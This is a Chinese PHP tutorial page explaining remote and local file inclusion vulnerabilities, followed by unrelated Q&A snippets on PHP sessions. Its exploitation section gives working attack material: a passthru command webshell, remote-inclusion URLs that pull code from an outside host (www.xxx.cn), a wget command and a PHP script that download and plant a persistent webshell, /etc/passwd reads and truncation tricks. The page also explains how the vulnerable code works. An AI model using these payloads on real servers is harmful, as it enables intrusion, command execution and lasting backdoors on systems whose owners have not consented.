PHP檔案包含詳細敘述-php教程-PHP中文網

首頁

後端開發

php教程

PHP檔案包含詳細敘述

韦小宝

Feb 12, 2018 am 11:25 AM

php詳細

一、什麼是」遠端檔案包含漏洞」？

回答是：

#伺服器透過php的特性（函數）去包含任意檔案時，由於要包含的這個文件來源過濾不嚴，從而可以去包含一個惡意文件，而我們可以建構這個惡意文件來達到邪惡的目的。
涉及的危險函數：include(),require()和include_once(),require_once()
Include:包含並執行指定文件，當包含外部文件發生錯誤時，系統給予警告，但整個php文件繼續執行。
Require:跟include唯一不同的是，當產生錯誤時候，include下面繼續運行而require停止運行了。
Include_once:這個函數跟include函數作用幾乎相同，只是他在導入函數之前先偵測下該檔案是否被導入。如果已經執行一遍那麼就不重複執行了。
Require_once:這個函數跟require的差別跟上面我所講的include和include_once是一樣的。所以我就不重複了。
php.ini設定檔：allow_url_fopen=off 即不可以包含遠端檔案。 Php4存在遠端&本地，php5僅存在本地包含。

二、為什麼要包含檔案？

程式設計師寫程式的時候，不喜歡做同樣的事情，也不喜歡把同樣的程式碼（例如一些公用的函數）寫幾次，於是就把需要公用的程式碼寫在一個單獨的檔案裡面，例如 share.php，而後在其它檔案進行包含呼叫。在php裡，我們就是使用上面列舉的那幾個函數來達到這個目的的，它的工作流程：如果你想在 main.php裡包含share.php,我將這樣寫include(“share.php”)就達到目的，然後就可以使用share.php中的函數了，像這個寫死需要包含的檔案名稱的自然沒有什麼問題，也不會出現漏洞，那麼問題到底是出在哪裡呢？

有的時候可能無法確定需要包含哪個文件，例如先來看下面這個文件index.php的程式碼：

if ($_GET[page]) {
include $_GET[page];
} else {
include ”home.php”;
}

很正常的一段PHP程式碼，它是怎麼運作的呢？

上面這段程式碼的使用格式可能是這樣的：

http://www.php.cn/m4r10/php/index.php?page=main.php

#或

http://www.php.cn/m4r10/php/index.php?page=downloads.php

結合上面程式碼，簡單說下怎麼運作的：

#提交上面這個URL，在index.php中就取得這個page的值（$_GET[page]）。
判斷$_GET[page]是不是空，若不空（這裡是main.php）就用include來包含這個檔案。
若$_GET[page]空的話就執行else，來 include 」home.php」　這個檔案。

三、為什麼會產生漏洞？

你也許要說，這樣很好呀，可以按照URL來動態包含文件，多麼方便呀，怎麼產生漏洞的呢？問題的答案是：我們不乖巧，我們總喜歡和別人不一樣，我們不會按照他的鏈接來操作，我們可能想自己寫想包含（調用）的文件，比如我們會隨便的打入下面這個URL ：http: //hi.baidu.com /m4r10/php/index.php?page=hello.php。然後我們的index.php程式就傻傻按照上面我們說得步驟去執行：取page為hello.php，然後去include(hello.php)，這時問題出現了，因為我們沒有hello.php這個文件，所以它 include的時候就會報警告，類似下列資訊：

Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening ’hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3

注意上面的那個Warning就是找不到我們指定的hello.php文件，也就是包含不到我們指定路徑的文件；而後面的警告是因為前面沒有找到指定文件，所以包含的時候就出警告了。

四、如何利用？

上面可以看到，問題出現了，那我們怎麼利用這樣的漏洞呢，利用方法其實很多，但是實質上都是差不多的，我這裡說三個比較常見的利用方法：

1.包含讀出目標機上其它檔案

由前面我们可以看到，由于对取得的参数page没有过滤，于是我们可以任意指定目标主机上的其它敏感文件，例如在前面的警告中，我们可以看到暴露的绝对路径(vhost/wwwroot/php/)，那么我们就可以多次探测来包含其它文件，比如指定URL为：http://hi.baidu.com /m4r10/php/index.php?page=./txt.txt可以读出当前路径下的txt.txt文件，也可以使用../../进行目录跳转（在没过滤../的情况下）；也可以直接指定绝对路径，读取敏感的系统文件，比如这个URL：http://hi.baidu.com/m4r10 /php/index.php?page=/etc/passwd，如果目标主机没有对权限限制的很严格，或者启动Apache的权限比较高，是可以读出这个文件内容的。否则就会得到一个类似于：open_basedir restriction in effect.的Warning（这里是由于apache的open_basedir中限制了访问目录）。

2.远程文件包含可运行的PHP木马

如果目标主机的”allow_url_fopen”是激活的（默认是激活的，没几个人会修改），我们就可以有更大的利用空间，我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行，比如，我先写一段运行命令的PHP代码，如下保存为cmd.txt（后缀不重要，只要内容为 PHP格式就可以了）。

<?php
if (get_magic_quotes_gpc()){
$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}　//去掉转义字符（可去掉字符串中的反斜线字符）
ini_set(“max_execution_time”,0);　//设定针对这个文件的执行时间，0为不限制.
echo ”M4R10开始行”;　　　　　　 //打印的返回的开始行提示信息
passthru($_REQUEST["cmd"]);　　　//运行cmd指定的命令
echo ”M4R10结束行”;　　　　　　 //打印的返回的结束行提示信息
?>

以上这个文件的作用就是接受cmd指定的命令，并调用passthru函数执行，把内容返回在M4R10开始行与M4R10结束行之间。把这个文件保存到我们主机的服务器上（可以是不支持PHP的主机），只要能通过HTTP访问到就可以了，例如地址如下：http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了：

http://www.php.cn/m4r10/php /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls

其中cmd后面的就是你需要执行的命令，其它常用的命令（以*UNIX为例）如下：

ll 列目录、文件（相当于Windows下dir)
pwd 查看当前绝对路径
id whoami 查看当前用户
wget　下载指定URL的文件

等等其它的，你主机去BAIDU找吧，就不列举了。

3.包含一个创建文件的PHP文件（常用）

也许有的人认为还是得到目标机上的一个真实的Webshell比较放心，万一哪天人家发现这儿个包含漏洞修补了，我们就不能再远程包含得到上面的那个” 伪”Webshell了，不是么？可以理解这个心态，我们继续。得到一个真实的Webshell，我们也说两种常见的方法：

1)使用wget之类的命令来下载一个Webshell

这个比较简单，也很常用，在上面我们得到的那个伪webshell中，我们可以执行命令，那么我们也可以调用系统中的一个很厉害的角色，wget，这个命令的强大你可以google下，参数一大堆，绝对搞晕你，呵呵，我们不需要那么复杂，我们就使用一个 -O（–output- document=FILE，把文档写到FILE文件中）就可以了，呵呵。

前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方，比如：http://www.xxx.cn/m4r10.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中执行如下的URL：

http://www.php.cn/m4r10/php/index.php?page=http://www.xxx.cn /cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php

如果当前目录可写，就能得到一个叫做m4r10.php的Webshell了，如果当前目录不可写，还需要想其它的办法。

2）使用文件来创建

前面的wget可能会遇到当前目录不能写的情况；或者目标主机禁用了（或者没装）这个命令，我们又需要变通一下了，我们可以结合前面的包含文件漏洞来包含一个创建文件（写文件）的PHP脚本，内容如下：

<?php
$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流
$ff=fopen(“./upload/m4r10.php”,”a”); 　　　　//寻找一个可以的目录，创建一个文件
fwrite ($ff,$f); 　//把前面打开的文件流写到创建的文件里
fclose($ff); 　　　//关闭保存文件
?>

还是写入我们上面用wget下载的那个php文件，但是我们改进了方法，用PHP脚本来实现，可以使用上面的cmd.php?cmd=ll查找可以写的目录，比如这里的upload，然后把文件创建在这个目录下：./upload/m4r10.php。然后就得到我们的Webshell了。

4.本地文件包含（常用）

典型的漏洞代码：

<?php
include($_GET[&#39;pages&#39;].‘.php’);
?>

黑盒判断方法：

单纯的从URL判断的话，URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

本地包含漏洞的利用（这里先忽略截断问题，下面会将截断的方法）

1、包含同服务器中上传的jpg、txt、rar等文件，这个是最理想的情况了。

2、包含系统的各种日志，如apache日志，文件系统日志等其中apache当记录格式为combined，一般日志都会很大，基本无法包含成功。包含log是有自动化攻击程序的。

突破限制截断后面的字符串技巧

利用本地包含时常常需要用%00来截断后面的字符串，但在GPC为ON时%00是会被转义的，那么还有其他方法么？

用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串（推测相对路径可用）

看漏洞代码：

<?php
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= &#39;.&#39;;
}
include  $webpath.$filepath.".php";
?>

test.txt 代码

结果截断失败，改下代码：

<?php
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= &#39;.&#39;;
}
include    $filepath.".php";  //相对路径
?>

这次成功。

以上是windows下的方法，其实linux也可以：

include截断

<?php
include $_GET[&#39;action&#39;].".php";
?>

提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”，但是除了“%00”还有没有其他的字符可以实现截断使用呢？

肯定有人想到了远程包含的url里问号“?”的作用，通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”：），好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下：

////var5.php代码:
////include $_GET[&#39;action&#39;].".php";
////print strlen(realpath("./"))+strlen($_GET[&#39;action&#39;]);
///////////////////
ini_set(&#39;max_execution_time&#39;, 0);
$str=&#39;&#39;;
for($i=0;$i<50000;$i++)
{
$str=$str."/";
$resp=file_get_contents(&#39;http://127.0.0.1/var/var5.php?action=1.txt&#39;.$str);
//1.txt里的代码为print &#39;hi&#39;;
if (strpos($resp, &#39;hi&#39;) !== false){
print $i;
exit;
}
}
?>

经过测试字符“.”、“ /”或者2个字符的组合，在一定的长度时将被截断，win系统和*nix的系统长度不一样，当win下strlen(realpath("./"))+strlen($_GET['action'])的长度大于256时被截断，对于*nix的长度是4 * 1024 = 4096。对于php.ini里设置远程文件关闭的时候就可以利用上面的技巧包含本地文件了。（此漏洞由cloie#ph4nt0m.org最先发现]）

推荐文章：

关于PHP文件包含一些漏洞分析

关于PHP文件包含一些漏洞分析。文章简单的分析了在php文件包含时inlcude的一个漏洞分析，下面希望对大家有点用处哦。

以上是PHP檔案包含詳細敘述的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

哪些常見問題會導致PHP會話失敗？Apr 25, 2025 am 12:16 AM

PHPSession失效的原因包括配置錯誤、Cookie問題和Session過期。 1.配置錯誤：檢查並設置正確的session.save_path。 2.Cookie問題：確保Cookie設置正確。 3.Session過期：調整session.gc_maxlifetime值以延長會話時間。

您如何在PHP中調試與會話相關的問題？Apr 25, 2025 am 12:12 AM

在PHP中調試會話問題的方法包括：1.檢查會話是否正確啟動；2.驗證會話ID的傳遞；3.檢查會話數據的存儲和讀取；4.查看服務器配置。通過輸出會話ID和數據、查看會話文件內容等方法，可以有效診斷和解決會話相關的問題。

如果session_start（）被多次調用會發生什麼？Apr 25, 2025 am 12:06 AM

多次調用session_start()會導致警告信息和可能的數據覆蓋。 1)PHP會發出警告，提示session已啟動。 2)可能導致session數據意外覆蓋。 3)使用session_status()檢查session狀態，避免重複調用。

您如何在PHP中配置會話壽命？Apr 25, 2025 am 12:05 AM

在PHP中配置會話生命週期可以通過設置session.gc_maxlifetime和session.cookie_lifetime來實現。 1)session.gc_maxlifetime控制服務器端會話數據的存活時間，2)session.cookie_lifetime控制客戶端cookie的生命週期，設置為0時cookie在瀏覽器關閉時過期。

使用數據庫存儲會話的優點是什麼？Apr 24, 2025 am 12:16 AM

使用數據庫存儲會話的主要優勢包括持久性、可擴展性和安全性。 1.持久性：即使服務器重啟，會話數據也能保持不變。 2.可擴展性：適用於分佈式系統，確保會話數據在多服務器間同步。 3.安全性：數據庫提供加密存儲，保護敏感信息。

您如何在PHP中實現自定義會話處理？Apr 24, 2025 am 12:16 AM

在PHP中實現自定義會話處理可以通過實現SessionHandlerInterface接口來完成。具體步驟包括：1)創建實現SessionHandlerInterface的類，如CustomSessionHandler；2)重寫接口中的方法（如open,close,read,write,destroy,gc）來定義會話數據的生命週期和存儲方式；3)在PHP腳本中註冊自定義會話處理器並啟動會話。這樣可以將數據存儲在MySQL、Redis等介質中，提升性能、安全性和可擴展性。

什麼是會話ID？Apr 24, 2025 am 12:13 AM

SessionID是網絡應用程序中用來跟踪用戶會話狀態的機制。 1.它是一個隨機生成的字符串，用於在用戶與服務器之間的多次交互中保持用戶的身份信息。 2.服務器生成並通過cookie或URL參數發送給客戶端，幫助在用戶的多次請求中識別和關聯這些請求。 3.生成通常使用隨機算法保證唯一性和不可預測性。 4.在實際開發中，可以使用內存數據庫如Redis來存儲session數據，提升性能和安全性。